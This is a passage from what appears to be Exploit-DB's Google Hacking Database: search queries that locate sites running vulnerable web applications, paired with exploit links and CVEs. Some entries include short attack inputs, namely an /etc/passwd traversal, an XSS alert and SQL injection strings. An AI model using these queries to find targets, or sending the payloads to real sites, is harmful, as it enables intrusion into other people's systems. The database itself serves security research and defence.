<textualDescription>Woltlab Burning Board 1.0.2, 2.3.6 search.php SQL Injection - CVE: 2007-0388: https://www.exploit-db.com/exploits/3143</textualDescription>
<query>&quot;Powered by Burning Board Lite 1.0.2&quot; or &quot;Powered by Burning Board 2.3.6&quot;</query>
<querystring>https://www.google.com/search?q=%22Powered+by+Burning+Board+Lite+1.0.2%22+or+%22Powered+by+Burning+Board+2.3.6%22</querystring>
<edb>https://www.exploit-db.com/exploits/3143</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3424</id>
<link>https://www.exploit-db.com/ghdb/3424</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by Burning Board&quot; -exploit -johnny</shortDescription>
<textualDescription>Woltlab Burning Board Lite 1.0.2pl3e (pms.php) SQL Injection - CVE: 2007-0812: https://www.exploit-db.com/exploits/3262</textualDescription>
<query>&quot;Powered by Burning Board&quot; -exploit -johnny</query>
<querystring>https://www.google.com/search?q=%22Powered+by+Burning+Board%22+-exploit+-johnny</querystring>
<edb>https://www.exploit-db.com/exploits/3262</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1756</id>
<link>https://www.exploit-db.com/ghdb/1756</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by CCLeague Pro&quot;</shortDescription>
<textualDescription>CCLeague Pro 1.2 Insecure Cookie Authentication Vulnerability - CVE: 2008-5123: https://www.exploit-db.com/exploits/5888</textualDescription>
<query>&quot;Powered by CCLeague Pro&quot;</query>
<querystring>https://www.google.com/search?q=%22Powered+by+CCLeague+Pro%22</querystring>
<edb>https://www.exploit-db.com/exploits/5888</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1557</id>
<link>https://www.exploit-db.com/ghdb/1557</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by cifshanghai.com&quot;</shortDescription>
<textualDescription>Cifshanghai (chanpin_info.php) CMS SQL Injection: https://www.exploit-db.com/exploits/10105</textualDescription>
<query>&quot;Powered by cifshanghai.com&quot;</query>
<querystring>https://www.google.com/search?q=%22Powered+by+cifshanghai.com%22</querystring>
<edb>https://www.exploit-db.com/exploits/10105</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2589</id>
<link>https://www.exploit-db.com/ghdb/2589</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by cityadmin and Red Cow Technologies, Inc.&quot;</shortDescription>
<textualDescription>cityadmin (links.php) Blind Sql Injection Vulnerability: https://www.exploit-db.com/exploits/11326</textualDescription>
<query>&quot;Powered by cityadmin and Red Cow Technologies, Inc.&quot;</query>
<querystring>https://www.google.com/search?q=%22Powered+by+cityadmin+and+Red+Cow+Technologies,+Inc.%22</querystring>
<edb>https://www.exploit-db.com/exploits/11326</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3050</id>
<link>https://www.exploit-db.com/ghdb/3050</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by ClanAdmin Tools v1.4.2&quot;</shortDescription>
<textualDescription>ClanWeb 1.4.2 Remote Change Password / Add Admin: https://www.exploit-db.com/exploits/8717</textualDescription>
<query>&quot;Powered by ClanAdmin Tools v1.4.2&quot;</query>
<querystring>https://www.google.com/search?q=%22Powered+by+ClanAdmin+Tools+v1.4.2%22</querystring>
<edb>https://www.exploit-db.com/exploits/8717</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3346</id>
<link>https://www.exploit-db.com/ghdb/3346</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by ClanTiger&quot; </shortDescription>
<textualDescription>ClanTiger 1.1.1 (Auth Bypass) SQL Injection Vulnerability: https://www.exploit-db.com/exploits/8472</textualDescription>
<query>&quot;Powered by ClanTiger&quot;</query>
<querystring>https://www.google.com/search?q=%22Powered+by+ClanTiger%22</querystring>
<edb>https://www.exploit-db.com/exploits/8472</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3518</id>
<link>https://www.exploit-db.com/ghdb/3518</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by ClanTiger&quot; </shortDescription>
<textualDescription>ClanTiger 1.1.1 Multiple Cookie Handling Vulnerabilities: https://www.exploit-db.com/exploits/8471</textualDescription>
<query>&quot;Powered by ClanTiger&quot; </query>
<querystring>https://www.google.com/search?q=%22Powered+by+ClanTiger%22</querystring>
<edb>https://www.exploit-db.com/exploits/8471</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3576</id>
<link>https://www.exploit-db.com/ghdb/3576</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by ClanTiger&quot;</shortDescription>
<textualDescription>ClanTiger 1.1.1 (slug) Blind SQL Injection: https://www.exploit-db.com/exploits/8473</textualDescription>
<query>&quot;Powered by ClanTiger&quot;</query>
<querystring>https://www.google.com/search?q=%22Powered+by+ClanTiger%22</querystring>
<edb>https://www.exploit-db.com/exploits/8473</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1320</id>
<link>https://www.exploit-db.com/ghdb/1320</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;powered by claroline&quot; -demo</shortDescription>
<textualDescription>this is for Claroline e-learning platform</textualDescription>
<query>&quot;powered by claroline&quot; -demo</query>
<querystring>https://www.google.com/search?q=%22powered+by+claroline%22+-demo&amp;num=100&amp;start=100&amp;sa=N&amp;filter=0</querystring>
<edb></edb>
<date>2006-03-30</date>
<author>anonymous</author>
</entry>
<entry>
<id>3421</id>
<link>https://www.exploit-db.com/ghdb/3421</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by Claroline&quot; -demo</shortDescription>
<textualDescription>Claroline</textualDescription>
<query>&quot;Powered by Claroline&quot; -demo</query>
<querystring>https://www.google.com/search?q=%22Powered+by+Claroline%22+-demo</querystring>
<edb></edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3505</id>
<link>https://www.exploit-db.com/ghdb/3505</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by Claroline&quot; -demo</shortDescription>
<textualDescription>Claroline 1.7.4 (scormExport.inc.php) Remote Code Execution: https://www.exploit-db.com/exploits/1627</textualDescription>
<query>&quot;Powered by Claroline&quot; -demo</query>
<querystring>https://www.google.com/search?q=%22Powered+by+Claroline%22+-demo</querystring>
<edb>https://www.exploit-db.com/exploits/1627</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1962</id>
<link>https://www.exploit-db.com/ghdb/1962</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by Clicknet CMS&quot;</shortDescription>
<textualDescription>Clicknet CMS 2.1 (side) Arbitrary File Disclosure Vulnlerability - CVE: 2009-2325: https://www.exploit-db.com/exploits/9037</textualDescription>
<query>&quot;Powered by Clicknet CMS&quot;</query>
<querystring>https://www.google.com/search?q=%22Powered+by+Clicknet+CMS%22</querystring>
<edb>https://www.exploit-db.com/exploits/9037</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1580</id>
<link>https://www.exploit-db.com/ghdb/1580</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;powered by clipshare&quot;</shortDescription>
<textualDescription>ClipShare 3.0.1 (tid) Remote SQL Injection Vulnerability - CVE: 2008-2793: https://www.exploit-db.com/exploits/5839</textualDescription>
<query>&quot;powered by clipshare&quot;</query>
<querystring>https://www.google.com/search?q=%22powered+by+clipshare%22</querystring>
<edb>https://www.exploit-db.com/exploits/5839</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3104</id>
<link>https://www.exploit-db.com/ghdb/3104</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by Clipshare&quot;</shortDescription>
<textualDescription>ClipShare 2.6 Remote User Password Change - CVE: 2008-7188: https://www.exploit-db.com/exploits/4837</textualDescription>
<query>&quot;Powered by Clipshare&quot;</query>
<querystring>https://www.google.com/search?q=%22Powered+by+Clipshare%22</querystring>
<edb>https://www.exploit-db.com/exploits/4837</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2575</id>
<link>https://www.exploit-db.com/ghdb/2575</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;powered by CMS Made Simple version 1.1.2&quot;</shortDescription>
<textualDescription>CMS Made Simple 1.2 Remote Code Execution Vulnerability - CVE: 2007-5056: https://www.exploit-db.com/exploits/4442</textualDescription>
<query>&quot;powered by CMS Made Simple version 1.1.2&quot;</query>
<querystring>https://www.google.com/search?q=%22powered+by+CMS+Made+Simple+version+1.1.2%22</querystring>
<edb>https://www.exploit-db.com/exploits/4442</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1736</id>
<link>https://www.exploit-db.com/ghdb/1736</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered By CMS-BRD&quot;</shortDescription>
<textualDescription>CMS-BRD (menuclick) Remote SQL Injection Vulnerability - CVE: 2008-2837: https://www.exploit-db.com/exploits/5863</textualDescription>
<query>&quot;Powered By CMS-BRD&quot;</query>
<querystring>https://www.google.com/search?q=%22Powered+By+CMS-BRD%22</querystring>
<edb>https://www.exploit-db.com/exploits/5863</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3313</id>
<link>https://www.exploit-db.com/ghdb/3313</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by CMS.GE&quot;</shortDescription>
<textualDescription>Binn SBuilder (nid) Remote Blind SQL Injection Vulnerability - CVE: 2008-0253: https://www.exploit-db.com/exploits/4904</textualDescription>
<query>&quot;Powered by CMS.GE&quot;</query>
<querystring>https://www.google.com/search?q=%22Powered+by+CMS.GE%22</querystring>
<edb>https://www.exploit-db.com/exploits/4904</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2109</id>
<link>https://www.exploit-db.com/ghdb/2109</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by CMScout ©2005 CMScout Group&quot;</shortDescription>
<textualDescription>CMScout 2.05 (common.php bit) Local File Inclusion Vulnerability - CVE: 2008-3415: https://www.exploit-db.com/exploits/6142</textualDescription>
<query>&quot;Powered by CMScout ©2005 CMScout Group&quot;</query>
<querystring>https://www.google.com/search?q=%22Powered+by+CMScout+%C3%82%C2%A92005+CMScout+Group%22</querystring>
<edb>https://www.exploit-db.com/exploits/6142</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2751</id>
<link>https://www.exploit-db.com/ghdb/2751</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by CMSimple&quot;</shortDescription>
<textualDescription>CMSimple 3.1 Local File Inclusion / Arbitrary File Upload - CVE: 2008-2650: https://www.exploit-db.com/exploits/5700</textualDescription>
<query>&quot;Powered by CMSimple&quot;</query>
<querystring>https://www.google.com/search?q=%22Powered+by+CMSimple%22</querystring>
<edb>https://www.exploit-db.com/exploits/5700</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2843</id>
<link>https://www.exploit-db.com/ghdb/2843</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by Comdev News Publisher&quot;</shortDescription>
<textualDescription>Comdev News Publisher Remote SQL Injection Vulnerability - CVE: 2008-1872: https://www.exploit-db.com/exploits/5362</textualDescription>
<query>&quot;Powered by Comdev News Publisher&quot;</query>
<querystring>https://www.google.com/search?q=%22Powered+by+Comdev+News+Publisher%22</querystring>
<edb>https://www.exploit-db.com/exploits/5362</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2159</id>
<link>https://www.exploit-db.com/ghdb/2159</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by ComicShout&quot;</shortDescription>
<textualDescription>ComicShout 2.8 (news.php news_id) SQL Injection Vulnerability - CVE: 2008-6425: https://www.exploit-db.com/exploits/5713</textualDescription>
<query>&quot;Powered by ComicShout&quot;</query>
<querystring>https://www.google.com/search?q=%22Powered+by+ComicShout%22</querystring>
<edb>https://www.exploit-db.com/exploits/5713</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1657</id>
<link>https://www.exploit-db.com/ghdb/1657</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by CommonSense CMS&quot;</shortDescription>
<textualDescription>CommonSense CMS Sql Injection Vulnerability: https://www.exploit-db.com/exploits/13762</textualDescription>
<query>&quot;Powered by CommonSense CMS&quot;</query>
<querystring>https://www.google.com/search?q=%22Powered+by+CommonSense+CMS%22</querystring>
<edb>https://www.exploit-db.com/exploits/13762</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2075</id>
<link>https://www.exploit-db.com/ghdb/2075</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by Content Injector v1.52&quot;</shortDescription>
<textualDescription>Content Injector 1.52 (index.php cat) Remote SQL Injection Vulnerability - CVE: 2007-6137: https://www.exploit-db.com/exploits/4645</textualDescription>
<query>&quot;Powered by Content Injector v1.52&quot;</query>
<querystring>https://www.google.com/search?q=%22Powered+by+Content+Injector+v1.52%22</querystring>
<edb>https://www.exploit-db.com/exploits/4645</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2224</id>
<link>https://www.exploit-db.com/ghdb/2224</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by Content Injector v1.53&quot;</shortDescription>
<textualDescription>Content Injector 1.53 (index.php) Remote SQL Injection Vulnerability - CVE: 2007-6394: https://www.exploit-db.com/exploits/4706</textualDescription>
<query>&quot;Powered by Content Injector v1.53&quot;</query>
<querystring>https://www.google.com/search?biw=1280&amp;bih=685&amp;q=%22Powered+by+Content+Injector+v1.53%22</querystring>
<edb>https://www.exploit-db.com/exploits/4706</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>619</id>
<link>https://www.exploit-db.com/ghdb/619</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by Coppermine Photo Gallery&quot;</shortDescription>
<textualDescription>published Oct 20, 2004, updated Oct 20, 2004vulnerable:Coppermine Photo Gallery Coppermine Photo Gallery 1.0Coppermine Photo Gallery Coppermine Photo Gallery 1.1Coppermine Photo Gallery Coppermine Photo Gallery 1.2Coppermine Photo Gallery Coppermine Photo Gallery 1.2.1Coppermine Photo Gallery Coppermine Photo Gallery 1.3Coppermine Photo Gallery Coppermine Photo Gallery 1.3.1Coppermine Photo Gallery Coppermine Photo Gallery 1.3.2Coppermine Photo Gallery is reported prone to a design error that may allow users to cast multiple votes for a picture.All versions of Coppermine Photo Gallery are considered vulnerable at the moment.http://www.securityfocus.com/bid/11485</textualDescription>
<query>&quot;Powered by Coppermine Photo Gallery&quot;</query>
<querystring>https://www.google.com/search?q=%22Powered+by+Coppermine+Photo+Gallery%22+&amp;btnG=Google+Search</querystring>
<edb></edb>
<date>2004-10-26</date>
<author>anonymous</author>
</entry>
<entry>
<id>3552</id>
<link>https://www.exploit-db.com/ghdb/3552</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by Coppermine Photo Gallery&quot;</shortDescription>
<textualDescription>Coppermine Photo Gallery 1.4.18 LFI / Remote Code Execution - CVE: 2008-3481:
https://www.exploit-db.com/exploits/6178</textualDescription>
<query>&quot;Powered by Coppermine Photo Gallery&quot;</query>
<querystring>https://www.google.com/search?q=%22Powered+by+Coppermine+Photo+Gallery%22</querystring>
<edb>https://www.exploit-db.com/exploits/6178</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>918</id>
<link>https://www.exploit-db.com/ghdb/918</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by Coppermine Photo Gallery&quot; ( &quot;v1.2.2 b&quot; | &quot;v1.2.1&quot; | &quot;v1.2&quot; | &quot;v1.1&quot; | &quot;v1.0&quot;)</shortDescription>
<textualDescription>Reportedly Coppermine Photo Gallery is prone to multiple input validation vulnerabilities, some of which may lead to arbitrary command execution. These issues are due to the application failing to properly sanitize and validate user-supplied input prior to using it in dynamic content and system command execution function calls.These issues may be exploited to steal cookie based authentication credentials, map the application root directory of the affected application, execute arbitrary commands and include arbitrary files. Other attacks are also possible.http://www.securityfocus.com/bid/10253/</textualDescription>
<query>&quot;Powered by Coppermine Photo Gallery&quot; ( &quot;v1.2.2 b&quot; | &quot;v1.2.1&quot; | &quot;v1.2&quot; | &quot;v1.1&quot; | &quot;v1.0&quot;)</query>
<querystring>https://www.google.com/search?num=100&amp;safe=off&amp;c2coff=1&amp;q=%22Powered+by+Coppermine+Photo+Gallery%22+%28+%22v1.2.2+b%22+%7C+%22v1.2.1%22+%7C+%22v1.2%22+%7C+%22v1.1%22+%7C+%22v1.0%22%29&amp;btnG=Se</querystring>
<edb></edb>
<date>2005-03-29</date>
<author>anonymous</author>
</entry>
<entry>
<id>3440</id>
<link>https://www.exploit-db.com/ghdb/3440</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by cpCommerce&quot;</shortDescription>
<textualDescription>cpCommerce</textualDescription>
<query>&quot;Powered by cpCommerce&quot;</query>
<querystring>https://www.google.com/search?q=%22Powered+by+cpCommerce%22</querystring>
<edb></edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2988</id>
<link>https://www.exploit-db.com/ghdb/2988</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered By CrownWeb.net!&quot; inurl:&quot;page.cfm&quot;</shortDescription>
<textualDescription>crownweb (page.cfm) Sql Injection Vulnerability: https://www.exploit-db.com/exploits/11299</textualDescription>
<query>&quot;Powered By CrownWeb.net!&quot; inurl:&quot;page.cfm&quot;</query>
<querystring>https://www.google.com/search?q=%22Powered+By+CrownWeb.net!%22+inurl:%22page.cfm%22</querystring>
<edb>https://www.exploit-db.com/exploits/11299</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>887</id>
<link>https://www.exploit-db.com/ghdb/887</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;powered by CubeCart 2.0&quot;</shortDescription>
<textualDescription>This search reveals an alarming number of servers running versions of Brooky CubeCart that are reported to be prone to multiple vulnerabilities due to insufficient sanitization of user-supplied data....susceptible to a remote directory traversal vulnerability...cross-site scripting vulnerability may allow for theft of cookie-based authentication credentials or other attacks.An exploit is not required.The following proof of concept examples are available:http://www.example.com/index.php?&amp;language=../../../../../../../../etc/passwdhttp://www.example.com/index.php?&amp;language=var%20test_variable=31337;alert(test_variable); Vulnerability was published 2-14-2005http://www.securityfocus.com/bid/12549/</textualDescription>
<query>&quot;powered by CubeCart 2.0&quot;</query>
<querystring>https://www.google.com/search?num=100&amp;safe=off&amp;c2coff=1&amp;as_qdr=all&amp;q=+%22powered+by+CubeCart+2.0%22</querystring>
<edb></edb>
<date>2005-02-16</date>
<author>anonymous</author>
</entry>
<entry>
<id>3656</id>
<link>https://www.exploit-db.com/ghdb/3656</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by CubeCart 3.0.4&quot;</shortDescription>
<textualDescription>CSRF:https://www.exploit-db.com/exploits/15822</textualDescription>
<query>&quot;Powered by CubeCart 3.0.4&quot;</query>
<querystring>https://www.google.com/search?q=%22Powered+by+CubeCart+3.0.4%22</querystring>
<edb>https://www.exploit-db.com/exploits/15822</edb>
<date>2010-12-24</date>
<author>anonymous</author>
</entry>
<entry>
<id>594</id>
<link>https://www.exploit-db.com/ghdb/594</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by CubeCart&quot;</shortDescription>
<textualDescription>--------------------------------------------------------Full path disclosure and sql injection on CubeCart 2.0.1--------------------------------------------------------[1]Introduction[2]The Problem[3]The Solution[4]Timeline[5]Feddback##############################################################[1]Introduction&quot;CubeCart is an eCommerce script written with PHP &amp; MySQL. With CubeCart you can setup a powerful online store as long as youhave hosting supporting PHP and one MySQL database.&quot;This info was taken from hxxp://www.cubecart.comCubeCart, from Brooky (hxxp://www.brooky.com), is a software formerly known as eStore.[2]The ProblemA remote user can cause an error in index.php using the parameter 'cat_id' which is not properly validated, displaying thesoftware's full installation path. It can also be used to inject sql commands. Examples follow:(a) http://example.com/store/index.php?cat_id='causes an error like this:&quot;Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in/home/example/public_html/store/link_navi.php on line 35Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in/home/example/public_html/store/index.php on line 170Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in/home/example/public_html/store/index.php on line 172&quot;(b) http://example.com/store/index.php?cat_id=1 or 1=1--displays all categories in the database[3]The SolutionNone at this time.Vendor contacted and fix will be avaliable soon.[4]Timeline(2/10/2004) Vulnerability discovered(2/10/2004) Vendor notified(3/10/2004) Vendor response[5]FeedbackComments and stuff to cybercide@megamail.pt</textualDescription>
<query>&quot;Powered by CubeCart&quot;</query>
<querystring>https://www.google.com/search?q=%22Powered+by+CubeCart%22</querystring>
<edb></edb>
<date>2004-10-19</date>
<author>anonymous</author>
</entry>
<entry>
<id>1991</id>
<link>https://www.exploit-db.com/ghdb/1991</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;powered by CubeCart&quot; inurl:&quot;index.php?_a=&quot;</shortDescription>
<textualDescription>CubeCart (index.php) SQL Injection Vulnerability: https://www.exploit-db.com/exploits/11495</textualDescription>
<query>&quot;powered by CubeCart&quot; inurl:&quot;index.php?_a=&quot;</query>
<querystring>https://www.google.com/search?q=%22powered+by+CubeCart%22+inurl:%22index.php%3F_a%3D%22</querystring>
<edb>https://www.exploit-db.com/exploits/11495</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1119</id>
<link>https://www.exploit-db.com/ghdb/1119</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by CuteNews&quot;</shortDescription>
<textualDescription>CuteNews 1.4.0 (possibly prior versions) remote code executionsoftware site: http://cutephp.com/description: &quot;Cute news is a powerful and easy for using news management system that use flat files to store its database. It supports comments, archives, search function, image uploading, backup function, IP banning, flood protection ...&quot;rgodsite: http://rgod.altervista.orgmail: retrogod [at] aliceposta it</textualDescription>
<query>&quot;Powered by CuteNews&quot;</query>
<querystring>https://www.google.com/search?q=%22powered+by+cutenews+1.4.%22</querystring>
<edb></edb>
<date>2005-09-17</date>
<author>anonymous</author>
</entry>
<entry>
<id>2341</id>
<link>https://www.exploit-db.com/ghdb/2341</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;powered by dataface&quot; &quot;powered by xataface&quot;</shortDescription>
<textualDescription>Xataface Admin Auth Bypass Vulnerability: https://www.exploit-db.com/exploits/11852</textualDescription>
<query>&quot;powered by dataface&quot; &quot;powered by xataface&quot;</query>
<querystring>https://www.google.com/search?q=%22powered+by+dataface%22+%22powered+by+xataface</querystring>
<edb>https://www.exploit-db.com/exploits/11852</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2875</id>
<link>https://www.exploit-db.com/ghdb/2875</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by Dayfox Designs&quot;</shortDescription>
<textualDescription>Dayfox Blog 4 (postpost.php) Remote Code Execution Vulnerability - CVE: 2007-1525: https://www.exploit-db.com/exploits/3478</textualDescription>
<query>&quot;Powered by Dayfox Designs&quot;</query>
<querystring>https://www.google.com/search?q=%22Powered+by+Dayfox+Designs%22</querystring>
<edb>https://www.exploit-db.com/exploits/3478</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2104</id>
<link>https://www.exploit-db.com/ghdb/2104</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;powered by DBHcms&quot;</shortDescription>
<textualDescription>DBHcms 1.1.4 Stored XSS: https://www.exploit-db.com/exploits/12499</textualDescription>
<query>&quot;powered by DBHcms&quot;</query>
<querystring>https://www.google.com/search?q=%22powered+by+DBHcms%22</querystring>
<edb>https://www.exploit-db.com/exploits/12499</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>486</id>
<link>https://www.exploit-db.com/ghdb/486</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by DCP-Portal v5.5&quot;</shortDescription>
<textualDescription>DCP-Portal is more a community system than a CMS - it nevertheless calls itsself CMS. They have never seen a real CMS. Version 5.5 is vulnerable sql injection.Vulnerabilities: http://search.securityfocus.com/swsearch?query=dcp-portal&amp;sbm=bid&amp;submit=Search%21&amp;metaname=alldoc</textualDescription>
<query>&quot;Powered by DCP-Portal v5.5&quot;</query>
<querystring>https://www.google.com/search?q=%22Powered+by+DCP-Portal+v5.5%22</querystring>
<edb></edb>
<date>2004-09-21</date>
<author>anonymous</author>
</entry>
<entry>
<id>3625</id>
<link>https://www.exploit-db.com/ghdb/3625</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered By Dejcom Market CMS&quot;</shortDescription>
<textualDescription>Submitter:Mormoroth PoC: http://server/showbrand.aspx?bc=%27 or 1=(select top 1 table_name from information_schema.tables where table_name not in('bill','billdetail','cart','charge'))--</textualDescription>
<query>&quot;Powered By Dejcom Market CMS&quot;</query>
<querystring>https://www.google.com/search?q=%22Powered+By+Dejcom+Market+CMS%22</querystring>
<edb></edb>
<date>2010-12-04</date>
<author>anonymous</author>
</entry>
<entry>
<id>2367</id>
<link>https://www.exploit-db.com/ghdb/2367</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by DesClub.com - phpLinkat&quot;</shortDescription>
<textualDescription>phpLinkat 0.1 Insecure Cookie Handling / SQL Injection Vulnerability - CVE: 2008-3407: https://www.exploit-db.com/exploits/6140</textualDescription>
<query>&quot;Powered by DesClub.com - phpLinkat&quot;</query>
<querystring>https://www.google.com/search?q=%22Powered+by+DesClub.com+-+phpLinkat%22</querystring>
<edb>https://www.exploit-db.com/exploits/6140</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1833</id>
<link>https://www.exploit-db.com/ghdb/1833</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;powered by devalcms v1.4.a&quot;</shortDescription>
<textualDescription>devalcms 1.4a XSS / Remote Code Execution - CVE: 2008-6982: https://www.exploit-db.com/exploits/6369</textualDescription>
<query>&quot;powered by devalcms v1.4.a&quot;</query>
<querystring>https://www.google.com/search?q=%22powered+by+devalcms+v1.4.a%22</querystring>
<edb>https://www.exploit-db.com/exploits/6369</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3684</id>
<link>https://www.exploit-db.com/ghdb/3684</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered By Dew-NewPHPLinks v.2.1b&quot;</shortDescription>
<textualDescription>SQL Injection: https://www.exploit-db.com/exploits/16122</textualDescription>
<query>&quot;Powered By Dew-NewPHPLinks v.2.1b&quot;</query>
<querystring>https://www.google.com/search?q=%22Powered%20By%20Dew-NewPHPLinks%20v.2.1b%22</querystring>
<edb>https://www.exploit-db.com/exploits/16122</edb>
<date>2011-02-06</date>
<author>anonymous</author>
</entry>
<entry>
<id>2082</id>
<link>https://www.exploit-db.com/ghdb/2082</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by DigitalHive&quot;</shortDescription>
<textualDescription>DigitalHive 2.0 RC2 (base_include.php) Remote Include Vulnerability - CVE: 2006-5493: https://www.exploit-db.com/exploits/2566</textualDescription>
<query>&quot;Powered by DigitalHive&quot;</query>
<querystring>https://www.google.com/search?q=%22Powered+by+DigitalHive%22</querystring>
<edb>https://www.exploit-db.com/exploits/2566</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3542</id>
<link>https://www.exploit-db.com/ghdb/3542</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;powered by discuz!</shortDescription>
<textualDescription>Discuz! 4.x SQL Injection / Admin Credentials Disclosure: https://www.exploit-db.com/exploits/2859</textualDescription>
<query>&quot;powered by discuz!</query>
<querystring>https://www.google.com/search?q=%22powered+by+discuz!</querystring>
<edb>https://www.exploit-db.com/exploits/2859</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2729</id>
<link>https://www.exploit-db.com/ghdb/2729</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered By diskos&quot;</shortDescription>
<textualDescription>Diskos CMS Manager (SQL/DB/Auth Bypass) Multiple Vulnerabilities - CVE: 2009-4798: https://www.exploit-db.com/exploits/8307</textualDescription>
<query>&quot;Powered By diskos&quot;</query>
<querystring>https://www.google.com/search?q=%22Powered+By+diskos%22</querystring>
<edb>https://www.exploit-db.com/exploits/8307</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>623</id>
<link>https://www.exploit-db.com/ghdb/623</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by DMXReady Site Chassis Manager&quot; -site:dmxready.com</shortDescription>
